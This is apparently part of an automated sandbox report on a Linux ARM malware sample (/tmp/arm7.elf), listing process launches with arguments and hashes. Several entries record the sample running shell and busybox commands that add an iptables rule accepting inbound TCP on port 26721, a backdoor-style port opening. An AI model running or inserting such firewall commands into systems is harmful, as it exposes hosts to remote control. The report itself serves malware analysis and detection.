                                                                    Start date (UTC):06/10/2024
                                                                    Path:/tmp/arm7.elf
                                                                    Arguments:-
                                                                    File size:4956856 bytes
                                                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:21
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/bin/sh
                                                                    Arguments:/bin/sh -c "/usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:21
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/bin/sh
                                                                    Arguments:-
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:21
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/tmp/arm7.elf
                                                                    Arguments:-
                                                                    File size:4956856 bytes
                                                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:21
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/bin/sh
                                                                    Arguments:/bin/sh -c "busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:21
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/bin/sh
                                                                    Arguments:-
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:21
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/usr/bin/busybox
                                                                    Arguments:busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
                                                                    File size:2172376 bytes
                                                                    MD5 hash:70584dffe9cb0309eb22ba78aa54bcdc

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:19
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/tmp/arm7.elf
                                                                    Arguments:-
                                                                    File size:4956856 bytes
                                                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:19
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/tmp/arm7.elf
                                                                    Arguments:-
                                                                    File size:4956856 bytes
                                                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:19
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/tmp/arm7.elf
                                                                    Arguments:-
                                                                    File size:4956856 bytes
                                                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:19
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/usr/lib/udisks2/udisksd
                                                                    Arguments:-
                                                                    File size:483056 bytes
                                                                    MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:19
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/usr/sbin/dumpe2fs
                                                                    Arguments:dumpe2fs -h /dev/sda2
                                                                    File size:31112 bytes
                                                                    MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:20
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/usr/lib/udisks2/udisksd
                                                                    Arguments:-
                                                                    File size:483056 bytes
                                                                    MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:20
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/usr/sbin/dumpe2fs
                                                                    Arguments:dumpe2fs -h /dev/sda2
                                                                    File size:31112 bytes
                                                                    MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                                                    Chronological Activities